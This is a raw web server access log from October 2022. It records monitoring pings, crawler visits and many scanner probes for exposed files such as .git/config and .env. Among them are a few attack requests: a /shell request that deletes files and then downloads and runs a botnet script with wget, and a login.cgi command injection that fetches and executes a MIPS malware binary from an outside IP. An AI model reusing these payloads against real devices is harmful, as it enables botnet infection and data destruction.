212.91.246.72 - - [03/Oct/2022:18:02:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
188.232.224.44 - - [03/Oct/2022:18:03:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [03/Oct/2022:18:03:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.232.47.167 - - [03/Oct/2022:18:04:34 +0200] "\x03" 501 316 "-" "-"
94.232.47.167 - - [03/Oct/2022:18:04:34 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [03/Oct/2022:18:04:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:05:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:06:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
110.172.141.158 - - [03/Oct/2022:18:07:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
79.110.62.189 - - [03/Oct/2022:18:07:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
79.110.62.189 - - [03/Oct/2022:18:07:30 +0200] "POST /debug.cgi HTTP/1.1" 404 314 "-" "python-requests/2.21.0"
212.91.246.72 - - [03/Oct/2022:18:07:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:08:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:09:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:10:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:11:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:12:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:13:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:14:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:15:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:16:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:17:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:18:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:19:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:20:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:21:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:22:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:23:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.220.43 - - [03/Oct/2022:18:24:39 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Oct/2022:18:24:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.220.43 - - [03/Oct/2022:18:24:54 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
192.241.220.43 - - [03/Oct/2022:18:25:17 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
192.241.220.43 - - [03/Oct/2022:18:25:27 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
192.241.220.43 - - [03/Oct/2022:18:25:27 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
192.241.220.43 - - [03/Oct/2022:18:25:29 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
192.241.220.43 - - [03/Oct/2022:18:25:29 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
192.241.220.43 - - [03/Oct/2022:18:25:42 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Oct/2022:18:25:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.220.43 - - [03/Oct/2022:18:26:41 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Oct/2022:18:26:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.220.43 - - [03/Oct/2022:18:27:35 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Oct/2022:18:27:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.19.141.122 - - [03/Oct/2022:18:27:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
46.19.141.122 - - [03/Oct/2022:18:27:43 +0200] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [03/Oct/2022:18:28:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:29:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:30:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:31:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:32:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:33:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
161.35.231.174 - - [03/Oct/2022:18:34:13 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [03/Oct/2022:18:34:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:35:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
161.35.231.174 - - [03/Oct/2022:18:36:30 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [03/Oct/2022:18:36:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:37:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:38:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:39:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:40:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
164.92.161.19 - - [03/Oct/2022:18:40:50 +0200] "\x99\xfe\xf0\x8c\x03k\x85\xb9$\xed\x88Ex\xc9\xbd\x13\x11\xccK\xfd1\xe8\t\xfd\x8bd\xc8V=\xe8\t\xfd0\xecK\xfd1\xe8" 400 329 "-" "-"
164.92.161.19 - - [03/Oct/2022:18:40:50 +0200] "\x16\x03\x01" 501 318 "-" "-"
164.92.161.19 - - [03/Oct/2022:18:40:50 +0200] "\x16\x03\x01" 501 318 "-" "-"
164.92.161.19 - - [03/Oct/2022:18:40:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Oct/2022:18:41:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:42:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:43:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:44:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
142.132.237.249 - - [03/Oct/2022:18:45:08 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "mindUpBot (datenbutler.de)"
142.132.237.249 - - [03/Oct/2022:18:45:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "mindUpBot (datenbutler.de)"
212.91.246.72 - - [03/Oct/2022:18:45:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:46:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:47:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.104.119.76 - - [03/Oct/2022:18:47:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
80.104.119.76 - - [03/Oct/2022:18:47:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [03/Oct/2022:18:48:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:49:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:50:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:51:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
111.59.229.15 - - [03/Oct/2022:18:51:47 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+botnet.psscc.cn/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
212.91.246.72 - - [03/Oct/2022:18:52:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:53:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
44.210.103.39 - - [03/Oct/2022:18:54:18 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; U; Android 10; zh-Hans-CN; YAL-AL50 Build/HUAWEIYAL-AL50) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.108 Quark/5.6.6.211 Mobile Safari/537.36"
44.210.103.39 - - [03/Oct/2022:18:54:20 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0"
34.239.152.28 - - [03/Oct/2022:18:54:31 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36"
44.200.93.193 - - [03/Oct/2022:18:54:33 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
212.91.246.72 - - [03/Oct/2022:18:54:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.235.23.155 - - [03/Oct/2022:18:54:49 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36"
212.91.246.72 - - [03/Oct/2022:18:55:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.236.65.125 - - [03/Oct/2022:18:55:55 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Peach/1.01 (Ubuntu 8.04 LTS; U; en)"
212.91.246.72 - - [03/Oct/2022:18:56:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:57:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:58:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:18:59:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.35 - - [03/Oct/2022:19:00:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
87.236.176.61 - - [03/Oct/2022:19:00:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
87.236.176.97 - - [03/Oct/2022:19:00:39 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
185.220.101.183 - - [03/Oct/2022:19:00:39 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
45.72.18.72 - - [03/Oct/2022:19:00:41 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
212.91.246.72 - - [03/Oct/2022:19:00:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:01:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:02:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:03:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:04:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:05:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:06:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:07:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:08:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:09:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:10:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:11:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:12:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:13:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:14:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:15:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.35 - - [03/Oct/2022:19:15:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.35 - - [03/Oct/2022:19:16:00 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
34.65.197.70 - - [03/Oct/2022:19:16:05 +0200] "\x16\x03\x01" 501 318 "-" "-"
34.65.197.70 - - [03/Oct/2022:19:16:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
34.65.197.70 - - [03/Oct/2022:19:16:05 +0200] "HELP" 501 319 "-" "-"
34.65.197.70 - - [03/Oct/2022:19:16:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "l9tcpid/v1.1.0"
34.65.197.70 - - [03/Oct/2022:19:16:05 +0200] "GET /.DS_Store HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
34.65.197.70 - - [03/Oct/2022:19:16:05 +0200] "GET /idx_config/ HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
34.65.197.70 - - [03/Oct/2022:19:16:05 +0200] "GET /telescope/requests HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
34.65.197.70 - - [03/Oct/2022:19:16:05 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
34.65.197.70 - - [03/Oct/2022:19:16:05 +0200] "GET /.json HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
34.65.197.70 - - [03/Oct/2022:19:16:05 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0" 70.197.65.34.bc.googleusercontent.com - - [03/Oct/2022:19:16:05 +0200] "GET /server-status HTTP/1.1" 403 322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
34.65.197.70 - - [03/Oct/2022:19:16:05 +0200] "GET /config.json HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
34.65.197.70 - - [03/Oct/2022:19:16:05 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
212.91.246.72 - - [03/Oct/2022:19:16:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:17:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:18:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.78.6.216 - - [03/Oct/2022:19:19:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
34.78.6.216 - - [03/Oct/2022:19:19:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
212.91.246.72 - - [03/Oct/2022:19:19:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:20:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:21:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.62.199.85 - - [03/Oct/2022:19:21:48 +0200] "\x16\x03\x01" 501 318 "-" "-"
178.62.199.85 - - [03/Oct/2022:19:21:48 +0200] "\x16\x03\x01" 501 318 "-" "-"
178.62.199.85 - - [03/Oct/2022:19:21:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.219.124 - - [03/Oct/2022:19:22:25 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
192.241.219.124 - - [03/Oct/2022:19:22:32 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Oct/2022:19:22:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.219.124 - - [03/Oct/2022:19:22:50 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
192.241.219.124 - - [03/Oct/2022:19:22:51 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
192.241.219.124 - - [03/Oct/2022:19:23:03 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Oct/2022:19:23:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
137.184.85.23 - - [03/Oct/2022:19:23:52 +0200] "\x16\x03\x01" 501 318 "-" "-"
137.184.85.23 - - [03/Oct/2022:19:23:52 +0200] "\x16\x03\x01" 501 318 "-" "-"
192.241.219.124 - - [03/Oct/2022:19:23:52 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
137.184.85.23 - - [03/Oct/2022:19:23:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.219.124 - - [03/Oct/2022:19:24:01 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Oct/2022:19:24:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.219.124 - - [03/Oct/2022:19:24:44 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
192.241.219.124 - - [03/Oct/2022:19:24:45 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
192.241.219.124 - - [03/Oct/2022:19:24:46 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Oct/2022:19:25:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:26:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
59.187.205.166 - - [03/Oct/2022:19:26:49 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [03/Oct/2022:19:27:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:28:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:29:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.58.124.134 - - [03/Oct/2022:19:29:55 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [03/Oct/2022:19:30:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
